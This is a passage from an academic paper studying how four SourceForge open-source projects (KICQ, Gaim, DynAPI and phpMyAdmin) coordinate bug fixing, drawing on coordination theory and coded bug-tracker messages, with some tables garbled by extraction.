Distributed Software Development Distributed teams offer numerous potential benefits, such as the possibility to perform different projects all over the world without paying the costs associated with travel or relocation, or ease of reconfiguring teams to quickly respond to changing business needs (DeSanctis & Jackson, 1994; Drucker, 1988) or to exploit available competences and distributed expertise (Grinter et al., 1999; Orlikowski, 2002). Distributed teams seem particularly attractive for software development, because software, as an information product, can be easily transferred via the same systems used to support the teams (Nejmeh, 1994; Scacchi, 1991). Furthermore, while many developed countries face a shortage of talented software developers, some developing countries have a pool of skilled professionals available, at lower cost (Metiu & Kogut, 2001, p. 4; Taylor, 1998). As well, the need to have local developers in each country for marketing and localization have made distributed teams a business need for many global software corporations (Herbsleb & Grinter, 1999b, p. 85). While distributed teams have many potential benefits, distributed workers face many real challenges. The specific challenges vary from team to team, as there is a great diversity in their composition and in the setting of distributed work. As mentioned, distributed work is characterized by numerous discontinuities that generate difficulties for members in making sense of the task and of communications from others, or produce unintended information filtering (de Souza, 1993). These interpretative difficulties make it hard for team members to develop a shared mental model of the developing project (Curtis et al., 1990, p. 52). A lack of common knowledge about the status, authority and competencies of participants brought together for the first time can be an obstacle to the creation of a social structure and
the development of team norms (Bandow, 1997, p. 88) and conventions (Weisband, 2002), thus frustrating the potential benefits of increased flexibility. Numerous studies have investigated social aspects of software development teams (e.g., Curtis et al., 1988; Humphrey, 2000; Sawyer & Guinan, 1998; Walz et al., 1993). These studies conclude that large system development requires knowledge from many domains, which is thinly spread among different developers (Curtis et al., 1988). As a result, large projects require a high degree of knowledge integration and the coordinated efforts of multiple developers (Brooks, 1975). However, coordination is difficult to achieve as software projects are non-routine, hard to decompose perfectly and face requirements that are often changing and conflicting, making development activities uncertain. Unfortunately, the problems of software development seem to be exacerbated when development teams work in a distributed environment with a reduced possibility for informal communication (Bélanger, 1998; Carmel & Agarwal, 2001; Herbsleb & Grinter, 1999a). In response to the problems created by discontinuities, studies of distributed teams stress the need for a significant amount of time spent in “community building” (Butler et al., 2002). In particular, members of distributed teams need to learn how to communicate, interact and socialize using CMC. Successful distributed cross-functional teams share knowledge and information and create new practices to meet the taskoriented and social needs of the members (Robey et al., 2000). Research has shown the importance of formal and informal adopted coordination mechanisms, information sharing for coordination and communications, and conflict management for project’s performance and quality (Walz et al., 1993). However, the processes of coordination suitable for distributed teams are still open topics for research (e.g., Orlikowski, 2002).
799
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
The FLOSS Phenomenon: A Literature Overview The growing literature on FLOSS has addressed a variety of questions. Some researchers have examined the implications of free software from economic and policy perspectives (e.g., Di Bona et al., 1999; Kogut & Metiu, 2001; Lerner & Tirole, 2001) as well as social perspective (e.g., Bessen, 2002; Franck & Jungwirth, 2002; Hann et al., 2002; Hertel et al., 2003; Markus et al., 2000). Other studies examine factors for the success of FLOSS projects (Hallen et al., 1999; Leibovitch, 1999; Pfaff, 1998; Prasad, n.d.; Valloppillil, 1998; Valloppillil & Cohen, 1998, Crowston and Scozzi, 2003). Among them, an open research question deals with the analysis of how the contributions of multiple developers can be brought into a single working product (Herbsleb & Grinter, 1999b). To answer such a question, a few authors have investigated the processes of FLOSS development (e.g., Jensen & Scacchi, 2005; Stewart & Ammeter, 2002). The most well-known model developed to describe FLOSS organization structure is the bazaar metaphor proposed by Raymond (1998). As in a bazaar, FLOSS developers autonomously decide the schedule and contribution modes for software development, making a central coordination action superfluous. While still popular, the bazaar metaphor has been broadly criticized (e.g., Cubranic, 1999). According to its detractors, the bazaar metaphor disregards some aspects of the FLOSS development process, such as the importance of the project leader control, the existence of de-facto hierarchies, the danger of information overloads and burnout, the possibility of conflicts that cause a loss of interest in a project or forking, and the only apparent openness of these communities (Bezroukov, 1999a, 1999b). Nevertheless, many features of the bazaar model do seem to apply. First, many teams are largely self-organizing, often without formally appointed leaders or formal indications of rank
800
or role. Individual developers may play different roles in different projects or move from role to role as their involvement with a project changes. For example, a common route is for an active user to become a co-developer by contributing a bug fix or code for a new feature, and for active and able co-developers to be invited to become members of the core. Second, coordination of project development happens largely (though not exclusively) in a distributed mode. Members of a few of the largest and most well-established projects do have the opportunity to meet faceto-face at conferences (e.g., Apache developers at ApacheCon), but such an opportunity is rare for most project members. Third, non-member involvement plays an important role in the success of the teams. Non-core developers contribute bug fixes, new features or documentation, provide support for new users and fill a variety of other roles in the teams. Furthermore, even though the core group provides a form of leadership for a project, they do not exercise hierarchical control. A recent study documented that self-assignment is a typical coordination mechanism in FLOSS projects and direct assignment are nearly nonexistent (Crowston et al., 2005). In comparison to traditional organizations then, more people can share power and be involved in FLOSS project activities. However, how these diverse contributions can be harnessed to create a coherent product is still an important question for research. Our article addresses this question by examining in detail a particular case, namely, coordination of bug-fixing processes.
CONCEPTUAL DEVELOPMENT In this section, we describe the theoretical perspectives we adopted to examine the coordination of bug fixing, namely, a process-oriented perspective and the coordination theory. We also introduce the topic of coordination and discuss
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
the literature on coordination in software development and the (small) literature on coordination in FLOSS teams.
Processes as Theories Most theories in organizational and information system research are variance theories, comprising constructs or variables and propositions or hypotheses linking them. By adopting a statistical approach, such theories predict the levels of dependent or outcome variables from the levels of independent or predictor variables, where the predictors are seen as necessary and sufficient for the outcomes. In other words, the logical structure of such theories is that if concept a implies concept b, then more of a means more (or less) of b. For example, the hypothesis that the adoption of ICT makes organization more centralized, examined as a variance theory, is that the level of organization centralization increases with the number of new ICTs adopted. An alternative to a variance theory is a process theory (Markus & Robey, 1988). Rather than relating levels of variables, process theories explain how outcomes of interest develop through a sequence of events. In that case, antecedents are considered as necessary but not sufficient for the outcomes (Mohr, 1982). For example, a process model of ICT and centralization might posit several steps each of which must occur for the organization to become centralized, such as development and implementation of an ICT system and use of the system to control decision premises and program jobs, resulting in centralization of decision making as an outcome (Pfeffer, 1978). However, if any of the intervening steps does not happen, a different outcome may occur. For example, if the system is used to provide information directly to lower-level workers, decision making may become decentralized rather centralized (Zuboff, 1988). Of course, theories
may contain some aspects of both variance and process theories (e.g., a variance theory with a set of contingencies), but for this discussion, we describe the pure case. Typically, process theories are of some transient process leading to exceptional outcomes, for example, events leading up to an organizational change or to acceptance of a system. However, we will focus instead on what might be called “everyday” processes: those performed regularly to create an organization’s products or services. For example, Sabherwal and Robey (1995) described and compared the processes of information systems development for 50 projects to develop five clusters of similar processes. Kaplan (1991, p. 593) states that process theories can be “valuable aids in understanding issues pertaining to designing and implementing information systems, assessing their impacts, and anticipating and managing the processes of change associated with them”. The main advantage of process theories is that they can deal with more complex causal relationships than variance theories. Also they embody a fuller description of the steps by which inputs and outputs are related, rather than noting the relationship between the levels of input and output variables. Specifically, representing a process as a sequence of activities provides insight into the linkage between individual work and processes, since individuals perform the various activities that comprise the process. As individuals change what they do, they change how they perform these activities and thus their participation in the process. Conversely, process changes demand different performances from individuals. ICT use might simply make individuals more efficient or effective at the activities they have always performed. However, an interesting class of impacts involves changing which individuals perform which activities and how activities are coordinated. Such an analysis is the aim of this article.
801
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Coordination of Processes In this subsection, we introduce the topic of coordination and present the fundamentals of coordination theory. Studying coordination means analyzing how dependences that emerge among the components of a system are managed. That stands for any kind of system, for example, social, economics, organic, or information system. Hence, the coordination of the components of a system is a phenomenon with a universal relevance (Boulding, 1956). The above definition of coordination is consistent with the large body of literature developed in the field of organization theory (e.g., Galbraith, 1973; Lawrence & Lorsch, 1967; Mintzberg, 1979; Pfeffer & Salancik, 1978; Thompson, 1967) that emphasizes the importance of interdependence. For example, according to Thompson (1967), organizational action consists of the coordination of the interdependences and the reduction of the costs associated to their management. Two components/systems are said to be interdependent if the action carried out by one of them affect the other one’s output or performance (McCann & Ferry, 1979; Mohr, 1971; Victor & Blackburn, 1987). For space reason, it is not possible to present all the contributions on coordination in the literature, but because of its relevance, we here briefly report on Thompson’s seminal work. Thompson (1967) identified three main kinds of interdependence, namely pooled, sequential and reciprocal interdependence. Pooled interdependence occurs among organization units that have the same goal but do not directly collaborate to achieve it. Sequential dependence emerges among serial systems. A reciprocal dependence occurs when the output of a system is the input for a second system and vice versa. The three kinds of interdependence require coordination mechanisms whose cost increases going from the first to the last one. The coordination by standardization, that is, routine and rules, is sufficient to manage
802
pooled-dependant systems. Coordination by plan implies the definition of operational schemes and plans. It can be used to manage pooled and sequential dependences. Finally, coordination by mutual adjustment is suitable for the management of reciprocal dependences. The interest devoted by scholars and practitioners to the study of coordination problems has recently increased due to the augmented complexity of products, production processes and to the rapid advancement in science and technology. To address these issues scholars have developed coordination theory, a systemic approach to the study of coordination (Malone & Crowston, 1994). Coordination theory synthesizes the contributions proposed in different disciplines to develop a systemic approach to the study of coordination. Studies on coordination have been developed based on two level of analysis, a micro and a macro level. In particular, most organization studies adopt a macro perspective, so considering dependencies emerging among organizational units. Other studies adopt a micro perspective, so considering dependencies emerging among single activities/actors. Coordination theory adopts the latter perspective and, in particular, focuses on the analysis of dependencies among activities (rather that actors). Hence, it is particularly useful to the description and analysis of organizational processes, which can be defined as a set of interdependent activities aimed to the achievement of a goal (Crowston, 1997; Crowston & Osborn, 2003). In particular, this approach has the advantage of making it easier to model the effects of reassignments of activities to different actors, which is common in process redesign efforts. We adopted this perspective because the study focuses on analyzing coordination mechanisms within processes. Consistent with the definition proposed above, Malone and Crowston (1994) analyzed group action in terms of actors performing interdependent tasks. These tasks might require or create
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
resources of various types. For example, in the case of software development, actors include the customers and various employees of the software company. Tasks include translating aspects of a customer’s problem into system requirements and code, or bug reports into bug fixes. Finally, resources include information about the customer’s problem and analysts’ time and effort. In this view, actors in organizations face coordination problems arising from dependencies that constrain how tasks can be performed. It should be noted that in developing this framework, Malone and Crowston (1994) describe coordination mechanisms as relying on other necessary group functions, such as decision making, communications, and development of shared understandings and collective sensemaking (Britton et al., 2000; Crowston & Kammerer, 1998). To develop a complete model of a process would involve modeling all of these aspects: coordination, decision making, and communications. In this article though, we will focus on the coordination aspects, bracketing the other phenomenon. Coordination theory classifies dependencies as occurring between a task and a resource, among multiple tasks and a resource, and among a task and multiple resources. Dependencies between a task and a resource are due to the fact that a task uses or creates a resource. Shared use of resources can in turn lead to dependencies between the tasks that use or create the resource. These dependencies come in three kinds. First, the flow dependence resembles the Thompson’s sequential dependency. Second, the fit dependence occurs when two activities collaborate in the creation of an output (though in the case where the output is identical, this might better be called synergy, since the benefit is that duplicate work can be avoided). Finally, the share dependency emerges among activities that share the use of a resource. Dependencies between a task and multiple resources are due to the fact that a task uses, creates or produces multiple resources or a
task uses a resource and create another resource. For example, in the case of software development, a design document might be created by a design task and used by programming tasks, creating a fit dependency, while two development tasks might both require a programmer (a share dependency) and create outputs that must work together (a fit dependency). The key point in this analysis is that dependencies can create problems that require additional work to manage (or provide the opportunity to avoid duplicate work). To overcome the coordination problems created by dependences, actors must perform additional work, which Malone and Crowston (1994) called coordination mechanisms. For example, if particular expertise is necessary to perform a particular task (a task-actor dependency), then an actor with that expertise must be identified and the task assigned to him or her. There are often several coordination mechanisms that can be used to manage a dependency. For example, mechanisms to manage the dependency between an activity and an actor include (among others): (1) having a manager pick a subordinate to perform the task; (2) assigning the task to the first available actor; and (3) having a labour market in which actors bid on jobs. To manage a usability subdependency, the resource might be tailored to the needs of the consumer (meaning that the consumer has to provide that information to the producer) or a producer might follow a standard so the consumer knows what to expect. Mechanisms may be useful in a wide variety of organizational settings. Conversely, organizations with similar goals achieved using more or less the same set of activities will have to manage the same dependencies, but may choose different coordination mechanisms, thus resulting in different processes. Of course, the mechanisms are themselves activities that must be performed by some actors, and so adding coordination mechanisms to a process may create additional dependences that must themselves be managed.
803
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Coordination in Software Development Coordination has long been a key issue in software development (e.g., Brooks, 1975; Conway, 1968; Curtis et al., 1988; Faraj & Sproull, 2000; Kraut & Streeter, 1995; Parnas, 1972). For example, Conway (1968) observed that the structure of a software system mirrors the structure of the organization that develops it. Both Conway (1968) and Parnas (1972) studied coordination as a crucial part of software development. Curtis et al. (1988) found that in large-scale software project, coordination and communication are among the most crucial and hard-to-manage problems. To address such problems, software development researchers have proposed different coordination mechanisms such a planning, defining and following a process, managing requirements and design specifications, measuring process characteristics, organizing regular meetings to track progress, implementing workflow systems, among the others. Herbsleb and Grinter (1999b), in a study of geographically-distributed software development within a large firm, showed that some of the previously mentioned coordination mechanisms—namely integration plans, componentinterface specifications, software processes and documentation—failed to support coordination if not properly managed. The mechanisms needed to be modified or augmented (allowing for the filling in of details, handling exceptions, coping with unforeseen events and recovering from errors) to allow the work to proceed. They also showed that the primary barriers to coordination breakdowns were the lack of unplanned contact, knowing whom to contact about what, cost of initiating a contact, ability to communicate effectively and lack of trust or willingness to communicate openly. Kraut and Streeter (1995), in studying the coordination practices that influence the sharing of information and success of software development, identified the following coordination tech-
804
niques: formal-impersonal procedures (projects documents and memos, project milestones and delivery schedules, modification request and error-tracking procedures, data dictionaries), formal-interpersonal procedures (status-review meetings, design-review meetings, code inspections), informal-interpersonal (group meetings and co-location of requirements and development staff, electronic communication such as e-mail and electronics bulletin boards, and interpersonal network). Their results showed the value of both informal and formal interpersonal communication for sharing information and achieving coordination in software development. Note though that this analysis focuses more the media for exchanging information rather than particular dependencies or coordination mechanisms that might be executed via these media. That is, once you have called a group meeting, what should you talk about?
Coordination in FLOSS Development A few studies have examined the work practices and coordination modes adopted by FLOSS teams in more detail, which is the focus of this article (Iannacci, 2005; Scacchi, 2002; Weber, 2004). Cubranic (1999) observed that the main media used for coordination in FLOSS development teams were mailing lists. Such a low-tech approach is adopted to facilitate the participation of wouldbe contributors, who may not have access to or experience with more sophisticated technology. The geographical distribution of contributors and the variability in time of contributors precluded the use of other systems (e.g., systems that support synchronous communication or prescriptive coordination technology, such as workflow systems). Mailing lists supported low-level coordination needs. Also, Cubranic (1999) found no evidence of the use of higher-level coordination, such as group decision making, knowledge management, task scheduling and progress tracking. As they are the main coordination mechanisms, the volume
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
of information within mailing lists can be huge. Mailing lists are therefore often unique repositories of source information on design choices and evolution of the system. However, dealing with this volume of information in large open source software projects can require a large amount of manual and mental effort from developers, who have to rely on their memory to compensate for the lack of adequate tools and automation. In a well-known case study of two important FLOSS projects, namely Apache and Mozilla, Mockus et al. (2002) distinguished explicit (e.g., interface specification processes, plans, etc.) and implicit coordination mechanisms adopted for software development. They argued that, because of its software structure, the Apache development team had primarily adopted implicit coordination mechanisms. The basic server was kept small. Core developers worked on what interested them and their opinion was fundamental when adding new functionality. The functionality beyond the basic server was added by means of various ancillary projects, developed by a larger community that interacted with Apache only through defined interfaces. Such interfaces coordinate the effort of the Apache developers: as they had to be designed based on what Apache provided, the effort of the Apache core group was limited. As a result, coordination relied on the knowledge of who had expertise in a given area and general communication on who is doing what and when. On the other hand, in the Mozilla project, because of the interdependence among modules, considerable effort is spent in coordination. In this case, more formal and explicit coordination mechanisms were adopted (e.g., module owners were appointed who had to approve all changes in their module). Jensen & Scacchi (2005) modelled the software-release process in three projects, namely Mozilla, Apache and NetBeans. They identified tasks, their dependencies and the actors performing them. However, they did not analyze the coordination issues in depth and did not focus
specifically on the bug-fixing process, which is the aim of this article. Rather, their final goal was to study the relationships among the three communities that form a Web Information Infrastructure. Iannacci (2005) adopted an organizational perspective to study coordination processes within a single large-scale and well-known FLOSS development project, Linux. He identified three main (traditional) coordination mechanisms, namely standardization, loose coupling and partisan mutual adjustment. Standardization is a coordination mechanism to manage pooled dependencies emerging among different contributors. It implies the definition of well-defined procedures, such as in the case of patch submission or bug-fixing procedures. Loose coupling is used to manage sequential dependencies among the different subgroups of contributors. It is the coordination mechanisms used to, for example, incorporating new patches. Finally, partisan mutual adjustment is a mechanism used to manage what Iannacci (2005) called networked interdependencies, an extension of the reciprocal dependencies as proposed by Thompson (1967). Networked interdependencies are those emerging among contributors to specific part of the software. Partisan mutual adjustment produces a sort of structuring process so creating an informal (sub-)organization. However, these findings are based on a single exceptional case, the Linux project, making it unclear how much can be generalized to smaller projects. Indeed, most of the existing studies are of large and well-known projects and focused on the development process. To our knowledge, no studies have analyzed the bug-fixing process in depth within small FLOSS development teams.
A Coordination Theory Application: The Bug-Fixing Process To ground our discussion of coordination theory, we will briefly introduce the bug-fixing process, which consists of the tasks needed to correct
805
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
software bugs. We decided to focus on the bugfixing process for three reasons. First, bug fixing provides “a microcosm of coordination problems” (Crowston, 1997). Second, a quick response to bugs has been mentioned as a particular strength of the FLOSS process: as Raymond (1998) puts it, “given enough eyeballs, all bugs are shallow”. Finally, it is a process that involves the entire developer community and thus poses particular coordination problems. While there have been several studies of FLOSS bug fixing, few have analyzed coordination issues within bug-fixing process by adopting a process view. For example, Sandusky et al. (2004) analyzed the bug-fixing process. They focus their attention on the identification of the relationships existing among bug reports, but they do not examine in details the process itself. In contrast to the prior work, our article provides empirical evidence about coordination practices within FLOSS teams. Specifically, we describe the way the work of bug fixing is coordinated in these teams, how these practices differ from those of conventional software development and thus suggest what might be learned from FLOSS and applied in other settings. We base our description on the work of Crowston (1997), who described the bug-fixing process observed at a commercial software company. Such a process is below defined as traditional because 1) it is carried out within a traditional kind of organization (i.e., the boundary are well defined, the environment is not distributed, the organization structure is defined) and 2) refers to the production of commercial rather than FLOSS software. The process is started by a customer who finds a problem when using a software system. The problem is reported (sometimes automatically or by the customer) to the company’s response center. In the attempt to solve the problem, personnel in the center look in a database of known bugs. If a match is found, the fix is returned to the customer; otherwise, after identifying the affected product, the bug report is forwarded to an engineer in the marketing center. The assigned engineer tries
806
to reproduce the problem and identify the cause (possibly requesting additional information from the reporter to do so). If the bug is real, the bug report is forwarded to the manager responsible for the module affected by the bug. The manager then assigns the bug to the software engineer responsible for that module. The software engineering diagnoses the problem (if she finds that the problem is in a different module, the report is forwarded to the right engineer) and designs a fix. The proposed fix is shared with other engineers responsible for modules that might be affected. When the feedback from those engineers is positive, the proposed design is transformed into lines of code. If changes in other module are needed, the software engineer also asks the responsible engineers for changes. The proposed fix is then tested, the eventual changed modules are sent to the integration manager. After approving, the integration manager recompiles the system, tests the entire system and releases the new software in the form of a patch. To summarize then, in the traditional bug-fixing process, the following tasks have been identified (Crowston, 1997): Report, Try to solve the problem, Search database for solution, Forward to the marketing manager, Try to solve the problem/Diagnose the problem, Forward to the Software Engineering Group, Assign the bug, Diagnose the problem, Design the fix, Verify affected modules and ask for approval, Write the code for the fix, Test it, Integrate changes, Recompile the module and link it to the system. After describing the above process, Crowston (1997) went on to analyze the coordination mechanisms employed. A number of the tasks listed can be seen as coordination mechanisms. For example, the search for duplicate bugs as well as the numerous forward and verify tasks manage some dependency. Searching for duplicate outputs is the coordination mechanism to manage a dependency between two tasks that might have the same output. In this case, the tasks are to respond
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
to bug reports from customers. These tasks can be performed by diagnosing and repairing the bug, but if the solution to the bug report can be found in the database, then the effort taken to solve it a second time can be avoided. Thus, searching the database for a solution is a way to manage a potential dependency between the two bug-fixing tasks. Forwarding and verifying tasks are coordination mechanisms used to manage dependency between a task and the actor appropriate to perform that task. These steps are needed because many actors are involved in the process and each of them carry out a very specialized task, requiring additional work to find an appropriate person to perform each task.
RESEARCH METHODOLOGY To address our research question, how are bug fixes coordinated in FLOSS projects, we carried out a multiple case study of different FLOSS projects, using the theoretical approach developed in the previous section. In this section, we discuss sample selection and data sources, data collection and data analysis, deferring a discussion of our findings to the following section.
Sample Section In this sub-section we describe the basis for selecting projects for analysis. Projects to be studied were selected from those hosted on SourceForge, (http://sourceforge.net/), a Web-based system that currently supports the development of more than 100,000 FLOSS projects (although only a small proportion of these are actually active). We chose to examine projects from a single source to control for differences in available tools and project visibility. Because the process of manually reading, rereading, coding and recoding messages is extremely labor-intensive, we had to focus our attention on a small number of projects. We selected projects to study in-depth by employing
a theoretical sampling strategy based on several practical and theoretical dimensions. First, we chose projects for which data we need for our analysis are publicly available, meaning a large number of bug reports. (Not all projects use or allow public access to the bug-tracking system.) Second, we chose teams with more than 8 developers (i.e., those with write access to the source code control system), since smaller projects seemed less likely to experience significant coordination problems. The threshold of eight members was chosen based on our expectation that coordinating tasks within a team would become more complicated as the number of members increases. We assumed that each member of the team could manage 4 or 5 relationship, but with eight members, we expected some difficulty in coordination to arise. Only 140 projects of SourceForge met the first two requirements in 2002 when we drew our sample. Third, projects were chosen so as to provide some comparison in the target audience and addressed topic, as discussed below. Finally, because we wanted to link coordination practices to project effectiveness, we tried to select more and less effective development teams. To this aim we used the definitions of effectiveness proposed by Crowston et al. (2006a), who suggest that a project is effective if it is active, the resulting software is downloaded and used and the team continues in operation. We selected 4 FLOSS projects to satisfy the mentioned criteria. Specifically, from the 140 large active projects, we selected two desktop chat clients that are aimed at end users (KICQ and Gaim) and two projects aimed primarily at developers (DynAPI, an HTML library and phpMyAdmin, a web-based database administration tool). A brief description of the projects is reported in Table 1, including the project goal, age at the time of the study, volume of communication and team membership. A consequence of the requirement of a significant number of bug reports is that all four projects are relatively advanced, making them representative of mature FLOSS projects. Based on the definition
807
808
KICQ ICQ client for the KDE project (a chat client) 1999-11-19 4 Beta, 5 Production Stable GPL Developers, End Users/Desktop ICQ, K Desktop Environment (KDE)
Open bugs/ 26 /88 Total # of bugs Open Support Requests/Total # of 12/18 requests Open Patches/ Total # 1/8 of Patches Open Features requests/Total # of 9/9 requests Mailing lists 813 messages in 3 mailing lists # of team 9 members Team member roles Admin/project man(# in role) ager (2); packager (1); developers (3); advisor/ mentor/ consultant(1); not specified (2)
License Intended Audience Topic
Registration date Development Status
Goal
Admin/project manager (1); developers (4); admin (3); not specified (3)
11
9595 in 5 mailing lists
Project manager (1); admin/ developer (1); support manager (1); web designer (1); developers (3) not specified (2)
phpMyAdmin Web-based database administration 2001-03-18 5 Production Stable GPL Developers, End Users/Desktop, System Administrators Front-Ends, Dynamic Content, Systems Administration
269 /1499
Gaim Multi-platform AIM client (a chat client) 1999-11-13 5 Production Stable GPL Advanced End Users, Developers, End Users/Desktop AOL Instant Messenger, ICQ, Internet Relay Chat, MSN Messenger
14/144
45/220
Dynamic Content
2000-05-15 5 Production Stable LGPL, GPL Developers
DynAPI Dynamic HTML library
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Table 1. Four examined projects
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
proposed by Crowston et al. (2006a), Kicq, Gaim and phpMyAdmin were chosen as examples of effective projects because they were active, the resulting software was being downloaded and the group had been active for a while. DynAPI was chosen as an example of a less effective project because the number of downloads and programming activity had rapidly decreased in the months leading up to the study.
Data Collection In this sub-section we describe how data were selected and collected. As mentioned above, all of these projects are hosted on SourceForge, making certain kinds of data about them easily accessible for analysis. However, analysis of these data poses some ethical concerns that we had to address in gaining human subjects approval for our study. On the one hand, the interactions recorded are all public and developers have no expectations of privacy for their statements (indeed, the expectation is the opposite, that their comments will be widely broadcast). Consent is generally not required for studies of public behaviour. On the other hand, the data were not made available for research purposes but rather to support the work of the teams. We have gone ahead with our research after concluding that our analysis does not pose any likelihood of additional harm to the poster above the availability of the post to the group and in the archive available on the Internet. We collected several kinds of data about each of the cases. First, we obtained data indicative of the effectiveness of each project, such as its level of activity, number of downloads and development status. Unfortunately, no documentation on the organization structure, task assignment procedures and coordination practices adopted was available on the projects’ web sites (further supporting the position that these teams do not employ formal coordination methods). To get at the bug-fixing process, we considered alternative sources of data. Interviewing the developers might have provided
information about their perceptions of the process, but would have required finding their identities, which was considered problematic given privacy concerns. Furthermore, reliance on self-reported data raises concerns about reliability of the data, the response rate and the likelihood that different developers would have different perceptions. While these issues are quite interesting to study (e.g., to understand how a team develops shared mental models of a project, for example, Crowston & Kammerer, 1998), they seemed like distractions from our main research question. Because of these concerns, we elected to use objective data about the bug-fixing process. Hence, the main source of data about the bug-fixing process was obtained from the archives of the bug tracking system, which is the tool used to support the bug-fixing process (Herbsleb et al., 2001, p. 13). These data are particularly useful because they are unobtrusive measures of the team’s behaviors (Webb & Weick, 1979) and thus provide an objective description of the work that is actually undertaken, rather than perceptions of the work. In the bug tracking system, each bug has a request ID, a summary (what the bug is about), a category (the kind of bug, e.g., system, interface), the name of the team member (or user) who submitted it, and the name of the team member it was assigned to. An example bug report in shown in Figure 1 (the example is fictitious). As well, individuals can post messages regarding the bug, such as further symptoms, requests for more information, etc. From this system, we extracted data about who submitted the bugs, who fixed them and the sequence of messages involved in the fix. By examining the name of the message senders, we can identify the project and community members who are involved in the bug-fixing process. Demographic information for the projects and developers and data from the bug tracking system were collected in the period 17–24 November 2002. We examined 31 closed bugs for Kicq, 95 closed bugs for DynAPI, 51 bugs for Gaim and 51 for PhPMyAdmin. The detailed
809
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Figure 1. Example bug report and followup messages
text of the bug reports is not reported because of space restriction but is available on request.
Data Analysis In this section we present our data analysis approach. For each of the bug reports, we carefully examined the text of the exchanged messages to identify the task carried out by each sender. We first applied the framework developed by Checkland & Scholes (1990), who suggested identifying
810
the owners, customers and environment of the process, the actors who perform it, the transformation of inputs into outputs, the environment and the worldview that makes the process meaningful. We then followed the method described by Crowston & Osborn (2003), who suggested expanding the analysis of the transformation by identifying in more detail the activities carried out in the transformation. We identified the activities by inductively coding the text of the messages in the bug tracking systems of the four projects. We
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Table 2. Coded tasks in the bug-fixing process 1.0.0 Submit (S) 1.1.0 Submit bug (code errors) 1.1.1 Submit symptoms 1.1.2 Provide code back trace (BT) 1.2.0 Submit problems 1.2.1 Submit incompatibility problems (NC) 2.0.0. Assign (As) 2.1.0 Bug self-assignment (A*) 2.2.0 Bug assignment (A) 3.0.0 Analyze (An) 3.1.0 Contribute to bug identification 3.1.1Report similar problems (R ) 3.1.2 Share opinions about the bug (T) 3.2.0 Verify impossibility to fix the bug 3.2.1 Verify bug already fixed (AF) 3.2.2.Verify bug irreproducibility (NR) 3.2.3 Verify need for a not yet supported function (NS) 3.2.4 Verify identified bug as intentionally introduced (NCP) 3.3.0 Ask for more details 3.3.1 Ask for Code version/command line (V) 3.3.2 Ask for code back trace/examples (RBT/E) 3.4.0 Identify bug causes (G) 3.4.1 Identify and explain error (EE) 3.4.2 Identify and explain bug causes different from code (PNC) 4.0.0 Fix (F) 4.1.0 Propose temporary solutions (AC) 4.2.0 Provide problem solution (SP) 4.3.0 Provide debugging code (F) 5.0.0 Test & Post (TP) 5.1.0 Test/approve bug solution 5.1.1 Verify application correctness (W) 5.2.0 Post patches (PP) 5.3.0 Identify further problems with proposed patch (FNW) 6.0.0 Close 6.1.0 Close fixed bug/problem 6.2.0 Closed not fixed bug/problems 6.2.1 Close irreproducible bug (CNR) and close it 6.2.2 Close bug that asks for not yet supported function (CNS) 6.2.3 Close bug identified as intentionally introduced (CNCP)
811
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
started by developing a coding scheme based on prior work on bug fixing (Crowston, 1997), which provided a template of expected activities needed for task assignment (those listed above). The coding system was then evolved through examination of the applicability of codes to particular examples. For example the message: I’ve been getting this same error every FIRST time I load the dynapi in NS (win32). After reloading, it will work… loading/init problem? represents a report submitted by another user (someone other than the person who initially identified and submitted the bug). This message was coded as “report similar problems”. Table 2 shows the list of task types that were developed for the coding. The lowest level elementary task types were successively grouped into 6 main types of tasks, namely Submit, Assign, Analyze, Fix, Test & Post, and Close. A complete example of the coded version of a bug report (the one from Figure 1) is shown in Figure 2.
Once we had identified the process tasks, we studied in depth the bug-fixing process as carried out in the four cases. Specifically, we compared the sequence of tasks across different bugs to assess which sequences were most common and the role of coordination mechanisms in these sequences. We also examined which actors performed which tasks as well as looked for ways to more succinctly present the pattern of tasks, for example, by presenting them as Markov processes. Because of the shortness and relative simplicity of our task sequences, we could exactly match task sequences, rather than having to statistically assess the closeness of matches to be able to form clusters (Sabherwal & Robey, 1995). Therefore, we were able to analyze the sequences by simple tabulation and counting, though more sophisticated techniques would be useful for larger scale data analysis. In the next Section we present the results of our analysis.
Figure 2. Coded version of bug report in Figure 1 Bug ID 0000000
812
SumAssigned to mary crash with alfa gills chat
Task (S) (V)
Person kkhub cenis
(R)
cobvnl
(V) (W) (TP&C) (C)
cenis kkhub cobvnl
Submitter kkhub
Comments asks what version kkhub is running reports the same problem as kkhub. submits information about the operating systems and the libraries asks again what version both users are running reports the most recent version of cicq works reports version information and close the bug bug closed
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
FINDINGS
individuals external to the team for each project are reported in Table 3. Table 4 summarizes our findings regarding the nature of the bugs fixing process in the four projects. We now present our overall analysis of the bug-fixing process. Each instance of a bug-fixing process starts (by definition) with a bug submission
In this section we present the findings from our analysis of the bug-fixing process in the four projects and the coordination mechanisms employed. Data about the percentage of submitted, assigned and fixed bugs both by team members and
Table 3. The bug-fixing process: Main results
Bugs submitted by team members Bugs submitted by members external to the team Bug assigned/self-assigned of which: Assigned to team members Self assigned Assigned to members external to the team Bug fixed Fixed by team members Bug fixed by members external to the team
Kicq DynAPI 9.7% 21%
Gaim phpMyAdmin 0% 21.6%
90.3%
78.9%
100%
9.7%
0%
0% 66% 33% 51,6% 81,3% 18,7%
78.4%
2%
-
1%
100%
42,1% 50% 50%
100% 0% 0% 80% 90,2% 9.8%
51% 84% 16%
Table 4. Observed characteristics of the bug-fixing processes in the four projects
Min task sequence Max task sequence Uncommon tasks (count) Community members Team members’ participation Most active team members Role/ name Max posting by single community member Not fixable bug closed
Kicq 3 8 Bug assignment (3) 18
DynAPI 2 12 Bug assignment (0) 53
Gaim 2 9 Bug assignment (0) 23
phpMyAdmin 2 13 Bug assignment (1) 20
2 of 9
6 of 11
3 of 9
4 of 10
Project mgr: denis; Developer: davidvh
Admin: rainwater; Ext member: dcpascal
